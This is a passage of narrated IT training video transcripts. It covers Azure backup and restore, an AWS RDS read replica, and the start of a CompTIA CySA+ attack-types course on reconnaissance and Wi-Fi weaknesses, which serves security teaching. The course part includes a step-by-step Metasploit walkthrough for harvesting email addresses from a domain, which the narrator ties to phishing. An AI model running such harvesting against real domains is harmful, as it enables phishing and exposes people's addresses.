[Video description begins] He clicks the "What do you want to backup?" drop-down option and a drop-down
list opens. It Includes several options. [Video description ends]
We can back up Files and Folders, VMware and Hyper-V Virtual Machines, Microsoft SQL Server,
SharePoint, Exchange, and so on. In this case, what I want to do to increase my data availability is back it up
into the cloud. So, that's for files running on file server. So, I'm going to choose Files and folders, make sure
that's selected, and then I'm going to click the Prepare Infrastructure button.
[Video description begins] He selects "Files and folders" option. A button labeled "Prepare Infrastructure"
appears in the second section.[Video description ends]
Now, that opens up another screen where the first thing I have to do is download the Recovery Services agent.
[Video description begins] A page labeled "Prepare infrastructure" opens in the content pane. It includes five
steps and a link labeled "Download Agent for Windows Server or Windows Client". [Video description ends]
So, the Microsoft Azure Recovery Services Agent is called the MARS Agent.
[Video description begins] He points to the "Download Agent for Windows Server or Windows Client"
link. [Video description ends]
And we've got a link here to download it into that operating system and that on-premises file server.
[Video description begins] A folder labeled "Downloads" is open in the "File Explorer window". The folder
contains an application labeled "MARSAgentInstaller". [Video description ends]
So, now that I've installed the MARS Agent on my on-premises file server, I'm going to go ahead and run it as
administrator to actually install it.
[Video description begins] He right clicks the Name "MARSAgentInstaller" and shortcut menu opens. He
clicks the option labeled "Run as administrator". [Video description ends]
Now part of the installation is going to be to register this on-premises file server with the Microsoft Azure
Recovery Services Vault. So, I'm going to accept the default.
[Video description begins] The wizard labeled "Microsoft Azure Recovery Services Agent Setup Wizard"
opens. It is divided into two parts. The first part labeled "Installation Stages". It contains four steps labeled
"Installation Settings", "Proxy Configuration", "Microsoft Update Opt-In", and "Installation". The
"Installation Settings" step is already selected and the corresponding page is open in the second part. It
includes a button labeled "Next >".[Video description ends]
The first screen, the installation location, I don't have a proxy server to go through to get to the Internet.
[Video description begins] He clicks the "Next >" button. The "Proxy Configuration" step gets selected and
the corresponding page opens in the second part. It includes a button labeled "Next >". [Video description
ends]
[Video description begins] The "Microsoft Update Opt-In" step gets selected and the corresponding page
opens in the second part. It includes a radio button labeled "Use Microsoft Update when I check for updates
(recommended)" and a button labeled "Next >". [Video description ends]
[Video description begins] He selects the "Use Microsoft Update when I check for updates (recommended)"
radio button. [Video description ends]
[Video description begins] He clicks the "Next >" button. The "Installation" step gets selected. It includes a
button labeled "Install". [Video description ends]
[Video description begins] He clicks the "Install" button and the installation process gets started. [Video
description ends]
So, at this point, it's installing the MARS Agent. But remember, we're not quite finished after the installation,
because we've not yet registered the server with the Recovery Services Vault for backup purposes and we need
to do that.
[Video description begins] The installation process gets completed and the buttons labeled "Proceed to
Registration" and "Close" appear. [Video description ends]
So, before too long, the file copy portion will complete and we'll have a Proceed to Registration button which I
will click.
[Video description begins] He clicks the "Proceed to Registration" button. A wizard labeled "Vault
Identification" opens. It is divided into two parts. The first part contains three steps. The steps labeled "Vault
Identification", "Encryption Setting", and "Server Registration". The "Vault Identification" step is already
selected and the corresponding page is open in the second part. It includes a textbox labeled "Vault
Credentials" and buttons labeled "Browse" and "Finish". [Video description ends]
[Video description begins] He switches back to the "Prepare infrastructure" page. He points to the second
step. It includes a checkbox labeled "Already downloaded or using the latest Recovery Services Agent" and a
button labeled "Download". [Video description ends]
Now back here in the Azure portal where we downloaded the agent, in step two, we can tell it that we've
already downloaded the agent which we have, and we can then download the vault credentials file.
[Video description begins] He selects the "Already downloaded or using the latest Recovery Services Agent"
checkbox. [Video description ends]
The vault credentials file is used to authenticate the server and register it with the vault, but it expires after 2
days.
[Video description begins] He switches back to the "Register Server Wizard". [Video description ends]
So, now that I've downloaded the vault credentials file, here in the wizard, I'm going to click the Browse
button. I have put it in the Downloads folder.
[Video description begins] The "File Explorer" window opens. [Video description ends]
Remember it's only good for two days, I'm going to select the vault credentials file.
[Video description begins] He clicks the folder labeled "Downloads". [Video description ends]
It's going to validate it, it knows the name of the vault, the location and so on.
[Video description begins] He clicks the "Open" button and the Vault credentials starts getting
validated. [Video description ends]
[Video description begins] The "Encryption Setting" step gets selected and the corresponding page opens in
the second part. It includes textboxes labeled "Enter Passphrase (minimum of 16 characters)" and "Confirm
Passphrase", a drop-down list box labeled "Enter a location to save the passphrase", and a button labeled
"Generate Passphrase". [Video description ends]
And, at this point, it wants me to either specify a passphrase or let it generate a passphrase that's going to be
used to encrypt and decrypt backups on this server. So, I'm going to choose Generate Passphrase and I'm going
to enter a location to save it.
[Video description begins] He selects the "Generate Passphrase" button and the passphrases gets filled in
both the textboxes. [Video description ends]
Now saving it locally on this server, you need to make sure that you are backing it up to store it elsewhere. So,
I'm going to click Finish. It warns me. I'm going to say yes, I want to continue.
[Video description begins] A pop-up box labeled "Microsoft Azure Backup" opens. It includes a text "Do you
want to continue?" and buttons labeled "Yes" and "No". [Video description ends]
And it's now registering the server with the Azure Recovery Services Vault.
[Video description begins] He clicks the "Yes" button. The "Server Registration" step gets selected and the
corresponding page opens in the second part. It includes a button labeled "Close". [Video description ends]
We can then see the backup passphrase, file name, and we have a warning about storing passphrases locally, it
should be stored elsewhere. That's fine. So, I'm now going to choose Launch Microsoft Azure Recovery
Services Agent, that's turned on. I'm going to click Close.
[Video description begins] The "Register Server Wizard" closes. [Video description ends]
[Video description begins] A window labeled "Microsoft Azure Backup" opens. It is divided into two parts.
The first part is the content pane. The second part is the navigation pane labeled "Actions". It includes the
options labeled "Schedule Backup", "Recover Data", and "Back Up Now". [Video description ends]
So, at this point, we are now ready to configure backup. So, for example, I could choose the Schedule Backup
button, which I'm going to do.
[Video description begins] He clicks the "Schedule Backup" button. A wizard labeled "Schedule Backup
Wizard" opens. It is divided into two parts. The first part includes steps labeled "Getting started", "Select
Items to Backup", "Specify Backup Schedule (Files and Folders)", "Select Retention Policy (Files and
Folders)", "Choose Initial Backup Type (Files and Folders)", "Confirmation", and "Modify Backup Progress".
The "Getting started" step is already selected and the corresponding page is open in the second part. The
second part includes a button labeled "Next >". [Video description ends]
[Video description begins] He clicks the "Next" button. The "Select Items to Backup" step gets selected and the
corresponding page is open in the second part. It includes buttons labeled "Add Items" and "Next >". [Video
description ends]
So, let's say we're going to go through and add some items that we want to back up.
[Video description begins] He clicks the "Add Items" button and a dialog box labeled "Select Items" opens. It
includes a button labeled "OK". [Video description ends]
Let's say, I want to take some contents of drive C from this host and back it up to the cloud. So, I'm going to
select drive C and expand it, and I've got a folder here called ProjectA_Files. I could expand that and see the
individual items and select them for backup to the cloud.
[Video description begins] He selects the folder labeled "ProjectA_Files", which includes the files labeled
"ProjectA_Budget.xls" and "ProjectA_ContactList.txt".[Video description ends]
But I'm going to choose the folder, it selects the items within it that are subordinates, and I'll click OK.
[Video description begins] The "Select Items" dialog box closes. [Video description ends]
[Video description begins] The "Specify Backup Schedule (Files and Folders)" step gets selected and the
corresponding page opens in the second part. It includes radio buttons labeled "Day" and "Week" under the
label: Schedule a backup every. The "Day" radio button is already selected. The second part also includes
three drop-down list boxes under the label: At following times (Maximum allowed is three times a day)" and
the button labeled "Next >". [Video description ends]
And we have our scheduling. We want to back it up daily or weekly. I'm going to leave it on daily, assuming
that we have to adhere to a daily RPO or recovery point objective. So, we can specify three times a day when
we want to back this up. So, we could do that again in conjunction with our recovery point objective.
[Video description begins] He clicks the second drop-down list box and the drop-down list opens. It includes
several options. He selects the option labeled "2:00 PM". [Video description ends]
So, once I've selected the options, I'll click Next. We can determine the weekly, monthly, and yearly retention
policy for the data.
[Video description begins] The "Select Retention Policy (Files and Folders)" step gets selected and the
corresponding page opens in the second part. It includes a button labeled "Next >". [Video description ends]
I'm going leave the default selections, and I'll click Next.
[Video description begins] The "Choose Initial Backup Type (Files and Folders)" step gets selected and the
corresponding page opens in the second part. It includes a button labeled "Next >". [Video description ends]
We're going to transfer this over the network, so our Internet connection to the Cloud.
[Video description begins] He clicks the "Next >" button. The "Confirmation" step gets selected and the
corresponding page opens in the second part. It includes a button labeled "Finish". [Video description ends]
And then we're on the summary confirmation screen and I'll click Finish.
[Video description begins] He clicks the "Finish" button. The "Modify Backup Progress" step gets selected
and the corresponding page opens in the second part. It includes a button labeled "Close". [Video description
ends]
[Video description begins] A Status: labeled "You have successfully created a backup schedule" is displayed.
He clicks the "Close" button and the "Schedule Backup Wizard" closes. [Video description ends]
However, we haven't yet backed up anything. So, I could wait for the schedule or I could choose Backup Now.
[Video description begins] He clicks the "Back Up Now" option and a wizard labeled "Back Up Now" opens.
It is divided into two parts. The first part contains four steps. The steps labeled "Select Backup Item", "Retain
Backup Till", "Confirmation", and "Backup progress". The "Select Backup Item" step is already selected and
the corresponding page is open in the second part. The second includes a button labeled "Next >". [Video
description ends]
[Video description begins] He clicks the "Next >" button. The "Retain Backup Till" step gets selected and the
corresponding page opens in the second part. It includes a button labeled "Next". [Video description ends]
And I can specify how long I want to retain the backup until, so I'll accept the defaults.
[Video description begins] He clicks the "Next >" button. The "Confirmation" step gets selected and the
corresponding page opens in the second part. It includes a button labeled "Back Up". [Video description ends]
It knows what I want to backup based on my schedule. So, I'll click Back Up, and it's on its way.
[Video description begins] The "Backup progress" step gets selected and the corresponding page opens in the
second part. It includes a button labeled "Close". [Video description ends]
It's backing up to the cloud now on demand. And it won't take too long before the job is completed.
[Video description begins] The "Back Up Now Wizard" closes. [Video description ends]
[Video description begins] The content pane of the "Microsoft Azure Backup" appears. He points to the row
entry: Backup under the column header: Message in the content pane. [Video description ends]
We can see that we do have a backup job that successfully has been completed and it's stored in Azure.
[Video description begins] He switches back to the "Vault1 - Backup" blade. [Video description ends]
Back here in the Azure portal, we can scroll down and under Protected items, if I click Backup items, we're
going to see that there's a reference to an Azure Backup Agent which corresponds to the one that we installed.
[Video description begins] He clicks the "Backup items" option and the corresponding page opens in the
content pane. It includes a table. The table contains several rows and two columns. The column headers
labeled "BACKUP MANAGEMENT TYPE" and "BACKUP ITEM COUNT". The table includes a row entry
labeled "Azure Backup Agent" and "1" under the column headers "BACKUP MANAGEMENT TYPE" and
"BACKUP ITEM COUNT" respectively. [Video description ends]
If I click it, we can see we're backing up some data from a specific server, that data source is on drive C.
[Video description begins] He clicks the row entry "Azure Backup Agent". A new blade labeled "Backup Items
(Azure Backup Agent)" opens. It includes a table. The table contains one row and four columns. The column
headers labeled "Backup item", "Protected server", "Last backup", and "Last Backup Time". The table also
includes row entries labeled "C:\" and "winsrv1." under the column headers labeled "Backup item" and
"Protected server" respectively. [Video description ends]
We can also see the last backup date and time.
After completing this video, you will be able to recognize how backups provide availability through disaster
recovery.
Objectives
[Video description begins] Topic title: System and Data Recovery. Your host for this session is Dan
Lachance. [Video description ends]
Data availability is an important part of every organization's security strategy. It relates to the RPO, the
recovery point objective, which states the maximum tolerable amount of data loss in terms of time. So, here on
my on-premises file server, I've already installed the Microsoft Azure Recovery Services, or MARS Agent.
The MARS Agent is required to register the server with an Azure Cloud-based vault, a Recovery Services
vault, for backup and restore purposes. When you install the MARS Agent, it also puts this Microsoft Azure
Backup icon on the desktop on that server. I'm going to launch that Azure Backup icon.
[Video description begins] The "Microsoft Azure Backup" window opens. The content pane is divided into
several sections. The first section labeled "Jobs (Activity in the past 7 days, double click on the message to see
details)" contains two tabs. The tabs labeled "Jobs" and "Alerts". The "Jobs" tab is selected and the
corresponding page is open. It contains a table. The table contains two rows and four columns. The column
headers labeled "Status", "Time", "Message", and "Description". He points to the row entries labeled
"Backup" and "Job completed" under the column headers "Message" and "Description" respectively. [Video
description ends]
Now here I can see that we've got a backup and recovery job that have already been completed. So, what I
want to do is perform a recovery. So, I'm going to choose the Recover Data button over in the Actions panel on
the right.
[Video description begins] He clicks the "Recover Data" button from the navigation pane. A wizard labeled
"Recover Data Wizard" opens. It is divided into two parts. The first part contains four steps labeled "Getting
Started", "Select Recovery Mode", "Select Volume and Date", and "Browse And Recover Files". The "Getting
Started" step is already selected and the corresponding page is open in the second part. The second part
includes a button labeled "Next >". [Video description ends]
We can choose the default to recover to this server where the data was originally backed up from. Or we can
choose to restore to a different server. I'll leave it on this server and I'll click Next.
[Video description begins] He clicks the "Next >" button. The "Select Recovery Mode" step gets selected and
the corresponding page opens in the second part. It includes a button labeled "Next >" [Video description
ends]
We can recover individual files and folders, or an entire volume or System state if we backed it up. In this
case, I'm going to leave it on Individual files and folders. Maybe there's only a single item I want to restore
from that Cloud-based backup. So, I'll click Next.
[Video description begins] The "Select Volume and Date" step gets selected and the corresponding page opens
in the second part. It contains a drop-down list option labeled "Select the volume". [Video description ends]
[Video description begins] He clicks the "Select the volume" drop-down list box and the drop- down list opens.
It contains an option labeled "C:\". He clicks the "C:/" option and a section labeled "Available backups"
appears. It includes a button labeled "Mount", a "calendar", a field labeled "Backup date:", and a drop-down
list box labeled "Time:". The Backup date labeled "2/26/2020" is already selected in the calendar. [Video
description ends]
And on the calendar, I can see the bold date here represents when there's a valid backup. And when I select
that date on the calendar, I have to choose the backup time. Because we can have backups scheduled for up to
three times daily. So, when I've selected that, I can click Mount to mount that backup set. Now, that's going to
mount it as a recovery volume.
[Video description begins] The "Browse And Recover Files" step gets selected and the corresponding page
opens in the second part. It includes buttons labeled "Browse" and "Unmount". [Video description ends]
After a moment, we can see the recovery volume has been mounted as a virtual disk on this host and we can
browse it to recover items. So, down below, I can click the Browse button.
[Video description begins] A pop-up box labeled "Tip: Use Robocopy" appears. It includes a button labeled
"OK". [Video description ends]
And then I'll click OK. And we can now see that we've got a mounted volume.
[Video description begins] The "File Explorer" window opens. [Video description ends]
If we just kind of expand that, we can see it's listed over here as Drive F on this host. We can see what was
backed up. In this case, a folder called ProjectA_Files, in which we can see actual backed up files.
[Video description begins] He clicks the "ProjectA_Files" folder. It contains files labeled
"ProjectA_Budget.xls" and "ProjectA_ContactList.txt". [Video description ends]
So, from this point, we could simply right-click and choose to Copy items from the backup set and paste it
wherever we choose to restore that data.
[Video description begins] He right-clicks the "ProjectA_ContactList.txt" file. [Video description ends]
After we've completed this, we can then Unmount that recovery volume once we're finished.
[Video description begins] He closes the "File explorer" window. [Video description ends]
And that's it, that's all you need to do after you've completed backup from an on-premises file server to the
Azure Cloud.
[Video description begins] He clicks the "Unmount" button. A dialog box labeled "Confirm Recovery Volume
Unmount" opens. It contains buttons labeled "Yes" and "No". He clicks the "Yes" button and the dialog box
closes. [Video description ends]
During this video, you will learn how to create a MySQL database read replica in a secondary region.
Objectives
[Video description begins] Topic title: Database Replicas. Your host for this session is Dan Lachance. [Video
description ends]
Amazon Web Services, or AWS, uses the Relational Database Service, or RDS, to facilitate the deployment of
database solutions in the cloud.
[Video description begins] A web page labeled "AWS Management Console" opens in the web browser. It is
divided into two parts. The first part includes the drop-down options labeled "Services" and Resource
Groups". The second part is a content pane. It is labeled "AWS Management Console". It includes tiles labeled
"AWS services" and "Access resources on the go". The "AWS services" tile includes a search bar labeled
"Find services". [Video description ends]
Now I've already done this for MySQL deployment. So, I'm going to go ahead and search here in the AWS
Management Console for rds. That's the Managed Relational Database Service.
[Video description begins] He types the text "rds" in the search bar and various search options appear. It
includes "RDS" option. [Video description ends]
Managed means in this context that we don't have to worry about setting up the underlying virtual machines to
support MySQL databases. We don't have to install the MySQL database software, it's already done. So, I'm
going to click on RDS.
[Video description begins] A web page labeled "RDS . AWSConsole" opens in the web browser. It is divided
into three parts. The first part is the taskbar. It includes a drop-down button labeled "N.Virginia". The second
part is the navigation pane labeled "Amazon RDS". It includes the options labeled "Dashboard" and
"Databases". The third part is the content pane. [Video description ends]
Now what I want to do is see which database instances I have deployed currently.
[Video description begins] He clicks the "Databases" option and the corresponding information opens in the
content pane. It includes a drop-down button labeled "Actions" and a table. The table includes one row and
several columns. It also includes column headers labeled "DB identifier" and "Engine". Adjacent to the row is
a radio button. The table also includes the row entries labeled "database-1" and "MySQL Community" under
the column headers "DB identifier" and "Engine" respectively. [Video description ends]
So, I'm going to click on Databases on the left and we have a DB identifier called database-1.
[Video description begins] He selects the radio button. The complete row in the table gets selected. [Video
description ends]
We can see that the Engine here is MySQL. What I want to do here to increase availability for any data stored
in that MySQL database is I want to create a replica. Now, I can choose to create a read replica in an alternate
location, which gives me really dual benefits. Those dual benefits include having an up-to-date copy of
replicated data elsewhere. And secondly, if in that alternate region it's a read heavy environment, such as for
querying, well then we can have a read replica there for that purpose. So, that's where we get our dual benefit.
[Video description begins] He points to the radio button. [Video description ends]
[Video description begins] He clicks the "Actions" drop-down button and a drop-down list opens. It includes
an option labeled "Create read replica". [Video description ends]
I'm going to go to the Actions menu where I have the option to create a read replica.
[Video description begins] He clicks the "Create read replica" option. The corresponding page labeled
"Create read replica DB instance" opens. It includes several sections labeled "Instance specifications",
"Network & Security", "Encryption", "Settings", and "Database options" and a button labeled "Create read
replica". [Video description ends]
When I do that, it's almost as if I'm deploying a brand new database instance here for my SQL, where I see a
lot of the things I would've seen originally before I even had it deployed in the cloud.
[Video description begins] He points to the "Instance specifications" section. It includes a drop-down list box
labeled "DB instance class" where an option labeled "db.r5.large - 2 vCPU, 16 GiB RAM" is already
selected. [Video description ends]
So, I can select the DB instance class, which identifies the underlying horsepower. So, virtual CPUs and RAM.
And I can determine, as we go further and further down, the Destination region.
[Video description begins] He points to the "Network & Security" section. It includes a drop-down list box
labeled "Destination region" where an option labeled "US East (N. Virginia)" is already selected. It also
includes radio buttons labeled "Yes" and "No" under the heading labeled "Publicly accessible". The "No"
radio button is already selected. [Video description ends]
Now, currently the region that we are in is shown up here in the upper right in the Amazon Web Services
console, US East (N. Virginia).
[Video description begins] He clicks the "Destination region" drop-down list box and the drop-down list
opens. It includes options labeled "US East (N. Virginia)" and "Canada (Central)". [Video description ends]
Well, I'm going to make sure that I replicate this to an alternate location, such as Canada (Central).
[Video description begins] He changes the options from "US East (N. Virginia)" to "Canada (Central)" in the
"Destination region" drop-down list box. [Video description ends]
Now when I do that, I can scroll down and determine whether I want that read-only replica to be publicly
accessible. And whether I want to use a specific key for encrypting it, there's a lot of different settings
available here. One of which I'm going to have to specify is the database instance identifier.
[Video description begins] He points to the "Settings" section. It contains a drop-down list box labeled "Read
replica source" where option labeled "database-1" is already selected and a textbox labeled "DB instance
identifier". [Video description ends]
The source is database-1. So, I'm going to call the replica database-1-replica1.
[Video description begins] He types the text "database-1-replica1" in the "DB instance identifier"
textbox. [Video description ends]
[Video description begins] He points to the "Database options" section. It includes a spin box labeled
"Database port" where option labeled "3306" is already selected by default. [Video description ends]
But that's only going to work if you're already connected to the virtual network in the cloud because public
accessibility is turned off here.
[Video description begins] In the "Network & Security" section, he points to the "No" radio button under the
heading labeled "Publicly accessible". [Video description ends]
We can always turn that on after if we really needed to. I'm not going to make any other changes here, so really
all I want to do here is click Create read replica.
[Video description begins] He scroll through the page. [Video description ends]
[Video description begins] He clicks the "Create read replica" button. The corresponding page labeled
"Create read replica DB instance" opens. It includes a button labeled "Close". [Video description ends]
So, back here in the RDS console, I can click on my original MySQL database identifier.
[Video description begins] The "Create read replica DB instance" page closes. The "RDS . AWS Console"
page appears. [Video description ends]
So, I'll click right on the link to open that up.
[Video description begins] He clicks the row entry labeled "database-1". The corresponding page labeled
"database-1" opens. It includes a section labeled "Replication (2)". [Video description ends]
And when I scroll down a little bit, we're going to eventually come across Replication, where we can see that
we've got our original master replica in the US East Zone.
[Video description begins] He points to the "Replication (2)" section. It includes a table. The table contains
two rows and six columns. It includes the column headers labeled "DB instance", "Role", and "Zone". The first
row includes the row entries labeled "database-1", "Master", and "us-east-1a" under the column headers "DB
instance", "Role", and "Zone" respectively. The second row includes the row entries labeled "database-1-
replica1 (Central)", "Replica", and "ca-central-1" respectively. [Video description ends]
So, the zone is us-east-1a but the region is US East. And we can see we've got a replica, there's the name of our
replica, which is in a different location. It's in Canada Central. So, in this way, we've achieved high availability
for the content stored within that cloud-based MySQL database instance.
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So, in this course, we've examined risk identification and prioritization, and planning for secure IT systems and
data, all in an effort to minimize the impact of business disruptions to an organization. We did this by
exploring structured risk management frameworks, the importance of a risk register and various risk
treatments, we talked about disaster recovery strategies and solutions that provide high availability, talked
about cybersecurity insurance as a form of risk transference, talked about the characteristics of a business
continuity plan and a business impact analysis. We looked at how to proactively design incident response plan
and how to conduct post-incident activities. We looked at how to enable Microsoft Azure storage account
replication, how to register a Windows Server with Azure for backup, and how backups provide availability
through recovery. And finally, we looked at how to create a MySQL database read replica in a secondary
geographical region.
In our next course, we'll move on to explore how a variety of different malicious attacks are executed so
security technicians are better able to provide effective countermeasures.
CompTIA Cybersecurity Analyst+: Attack Types
Helping protect your company's valuable assets against malicious attacks by outsiders requires a seasoned
understanding of modern-day cyber threats. This 21-video course prepares learners to thwart reconnaissance
and surveillance attacks by hackers and ward off Wi-Fi vulnerabilities, by using the proper tools. First,
examine the wide variety of possible modes of attack—from injection, overflow, and cross-site scripting to
XML (extensible markup language), DoS, address resolution protocol (ARP) poisoning, and password
compromises. Then develop valuable skills in counteracting web browser compromises and agility in the use
of Kali Linux Wi-Fi tools. Learn OWASP’s (Open Web Application Security Project) Top 10 vulnerabilities
and ESAPI (Enterprise Security application programming interface) tools for each one, such as ZAP (Zed
Attack Proxy), to test web application security. While you’re learning, pause to meet the aptly-named John the
Ripper, a free tool for cracking passwords on 15 platforms! The course helps to prepare learners for
CompTIA+ Cybersecurity Analyst+ (CySA+) CS0-002 certification exam.
Table of Contents
[Video description begins] Topic title: Course Overview. The presenter is Dan Lachance, an IT Trainer /
Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA and Microsoft. Some of my specialties over the years have included
networking, IT security, Cloud Solutions, Linux management and configuration and troubleshooting across a
wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst or CySA+ certification exam
is designed for IT professionals looking to gain security analyst skills to perform data analysis, to identify
vulnerabilities, threats and risks to an organization.
To configure and use threat detection tools, and secure and protect an organization's applications and systems.
In this course, we're going to explore how a number of different malicious attacks are executed by hackers.
And some of the tools available for use by security technicians to counter these attacks. I'll start by examining
how reconnaissance is used to gather information for hacking, and how the Metasploit Framework is used to
generate e-mail lists. I'll then explore various WiFi vulnerabilities and the attack techniques. I'll show how to
use Kali WiFi tools and how to harden a router.
Next, I'll examine injection, overflow, and Cross-site scripting attacks. And I'll use the BeEF tool to hack a
web browser. I'll continue with an examination of XML attacks, common web application vulnerabilities, and
how to test web application security using the OWASP ZAP tool. I'll then demonstrate the use of the slow
HTTP test command to run a DoS attack. Lastly, I'll examine password attacks, show the use of the Hydra
password attack tool, and use the John the Ripper tool to crack user passwords.
[Video description begins] Topic title: Reconnaissance. The presenter is Dan Lachance. [Video description
ends]
Reconnaissance is information gathering where an attacker tries to engage with the system to learn more about
it. Enumeration follows. An example of this would be once we discover that we've got an active host on a
network. We start running a scan against it such as a port scan to see which network services are in the
listening state on that host. From there we can then determine if any of them are vulnerable. And those
vulnerabilities can be exploited to gain access to that host. After which maintaining access can take place.
Normally, this takes the form of a malicious user that's managed to gain access to creating a backdoor account
that looks like it belongs, but is really used by the attacker. After which the hacking process would then end
with the attacker trying to cover their tracks. Which would include perhaps the removal of any log entries that
would indicate the compromise has occurred. IT reconnaissance comes in many different forms. It can be
simply determining which hosts on a network are active. That's usually the starting point. But it can also
include discovering IP addresses, perhaps from network diagrams, for an organization, or querying DNS
records to learn about the names of hosts, which could imply the type of host it is, and also the IP addresses of
those hosts.
We've discussed that port scanning can be used for reconnaissance to learn which services are in a listening
state on a machine. And then, of course, malware could be used to infect hosts on an internal network that
could then perhaps run internal scans and send those results to an attacker outside of a network.
Reconnaissance also includes other physical activities like dumpster diving. Sometimes there can be a treasure
trove of information, where you can learn about an organization for instance by looking through trash cans.
Trash cans could have documentation about procedures or changes to the versions of software or could include
default password information, that type of thing.
Shoulder surfing occurs when someone has the ability to essentially look over someone's back onto what
they're doing on a screen or to see what they're typing into a keypad, which can also be done remotely with
video surveillance. Social media scraping and website scraping means trying to essentially run a dragnet for
useful information through social media feeds or maybe scraping websites looking for e-mail addresses. Now
these things don't have to be done manually. There are plenty of tools that can help automate this type of
scraping for reconnaissance.
There are a lot of tools that can be used for reconnaissance, scanning tools. And depending on how those tools
are used determines if they are considered good or bad. There are tools like Nmap, which can be used to
determine which hosts are active on a network and which services they are running. Nessus, which is actually a
vulnerability scanner that can show you any vulnerabilities that might be present on hosts that were discovered
on a network. You might even have custom scripts written in PowerShell or in the Unix and Linux
environment in a Bash shell script that enumerate the network looking for some type of vulnerability.
Now how do we mitigate against this? Well, the first one is user training and awareness, such as users knowing
that they shouldn't just click links they receive from unsolicited e-mails that they were not expecting. Firewalls
can also be used to limit who can gain access into a network in the case of a perimeter firewall, what type of
traffic. And then every individual host should also have a firewall configured accordingly to limit access to
that host or perhaps to hide anything that might be running. Limiting network access is key here because if an
attacker cannot even connect to a network in the first place, it becomes difficult for them to even perform any
kind of reconnaissance. So maybe using some kind of network authentication protocols to authenticate to the
network prior to letting access to the network could prove helpful. Finally, intrusion detection and prevention
systems can be used to detect any abnormal activity.
In this video, you will learn how to use the Metasploit Framework to generate email lists.
Objectives
[Video description begins] Topic title: E-mail Harvesting. The presenter is Dan Lachance. [Video description
ends]
Kali Linux is a free Linux distribution that you can download and run, and it contains numerous penetration
testing tools. One of the things we're going to look at in this example is e-mail harvesting. It's a reconnaissance
technique used by malicious users to find e-mail addresses that they then might use, for instance, to send
phishing e-mail messages to. So to get started here, I'm going to run the sudo command.
[Video description begins] The following window is open: dlachance@kali:/. The following prompt is
displayed: dlachance@kali:/$. [Video description ends]
This prefix allows me to run commands in a privileged escalated mode, and I'm going to run msfconsole that
stands for a Metasploit Framework console. The Metasploit Framework is part of Kali Linux and it contains a
number of different modules that allow you to execute a number of different types of attacks for testing
purposes. So I'm going to go ahead and press Enter to start that up.
[Video description begins] He executes the following command: sudo msfconsole. The output displays that the
metasploit framework console has started. The prompt changes to msf5 >. He executes the following
command: clear. No output displays and the prompt does not change. [Video description ends]
Now the next thing I would do is I would have to determine the name of the module that I want to load up and
then run. So for example, I could use the search keyword here. And I can search for any of the modules dealing
with gathering, such as gathering e-mail addresses and so on. We can see there are plenty of them here.
[Video description begins] He executes the following command: search gather. The output displays a list of
modules with the word gather. The prompt does not change. He executes the following command: clear. No
output displays and the prompt does not change. [Video description ends]
Now once I've learned of that, I can actually use it to make it active. So I'm going to use
auxiliary/gather/search_email_collector. And I know it's good because it found it and it changed my command
prompt.
If I type show info, it will give me some details about how this exploit is to be used and what it's for.
[Video description begins] He executes the following command: show info. The output displays information
about the Search Engine Domain Email Address Collector. The prompt does not change. [Video description
ends]
We even see some options, which alternatively you could also type show options once you've loaded up one of
those modules.
[Video description begins] He executes the following command: clear. No output displays and the prompt does
not change. [Video description ends]
And you can see here, we can set a domain that we want to search through.
[Video description begins] He executes the following command: show options. The output displays module
options. [Video description ends]
So for example, if we're looking for Hotmail e-mail addresses, we could set the DOMAIN item to
hotmail.com. We can specify an output file. Let's go ahead and do this. So I'm going to set the DOMAIN to
hotmail.com. And I'm going to set the output file, let's say, on the root to a file called emails.txt. And then we
simply type in run to run this exploit. Now from here you can then exit out, not that you have to exit out and
begin taking a look at the resultant file. So for that, I could run cat and I can take a look at the emails.txt. And
here we can see a number of e-mail addresses that were found using the msfconsole, the Metasploit
Framework console.
After completing this video, you will be able to list common Wi-Fi network vulnerabilities and mitigation
strategies.
Objectives
[Video description begins] Topic title: Wi-Fi Vulnerabilities. The presenter is Dan Lachance. [Video
description ends]
WiFi networking sends radio transmission signals through the air. And it's convenient because end user
devices don't have to be plugged into a wall jack to gain network access. But with this convenience comes
potential threats. The first thing we have to think about is sticking with default configurations. Now with any
type of IT solution, this is always a bad idea. Makes you more vulnerable because those default configurations
are known by everybody. Things like known SSIDs. For example, if you purchase a D-Link wireless router,
and you leave it with the default SSID or wireless network name of D-Link. Then that's one less thing attackers
would need to figure out if they're trying to determine if there are any vulnerabilities.
The same goes with firmware versions. You want to make sure that you update the firmware in things like
wireless routers because often those patches address security holes. And of course, using default usernames
and passwords to log in to WiFi devices is a no no. Because, again, it is widely known by everybody. Now
back to the known SSID issue, you might say, well what if I have an ASUS wireless router and I call it D-
Link? That's not a bad idea, because then you're at least throwing potential attackers off the trail at least a little
bit. Anything that can prevent knowledge of what exactly is being used and how it's configured helps when it
comes to securing a WiFi environment.
The web admin GUI is built in to some equipment like WiFi routers. It allows you to manage that routers
configuration through a web page. You want to make sure if you're doing that, that you're using HTTPS to
secure the connection as opposed to HTTP to access the web admin GUI. You want to make sure that you're
using the TLS version 1.2 or higher protocol if it's supported. Now anything prior to this TLS version 1.1 is
considered deprecated and vulnerable and so are all SSL versions, including SSL3. Shouldn't be using them if
you have a choice. Then we have to think about vulnerable devices that might be on the network where our
WiFi devices are connected. Think about having an IoT device like a security camera for home video
surveillance.
Many IoT devices do not have a security as being a high priority. And so they'll ship with some default settings
that might even be baked into the firmware that can't be changed or updated. You want to make sure that those
type of devices, number one aren't even being used if possible. But if they must be, then they're on an isolated
network. All it takes to compromise an entire network is one compromised device. So that's why network
segregation and controlling connectivity to networks with vulnerable devices, is an important hardening factor
with WiFi networking. Look out for weak encryption implementations. An example of this would be WEP.
WEP, or the wired equivalent privacy encryption standard, has long been considered deprecated for WiFi
networking. And there's a newer WPA version 3 protocol coming out that we should try to adhere to, but that
means you have to have your equipment that supports that standard. Otherwise you might use WPA2, WiFi
protected access version 2 to secure your network in terms of encryption.
[Video description begins] Physical Security and Wi-Fi Vulnerabilities. [Video description ends]
The other thing is physical security. Imagine that we've got a lobby or a public WiFi hotspot location. Now
what an attacker or malicious user might do is physically bring an access point with them and plug it in to a
location where it can't be detected, such as behind a plant in the lobby. Now even if that lobby normally doesn't
support WiFi, if there's a network jack that's active behind the plant on the wall, an access point could be
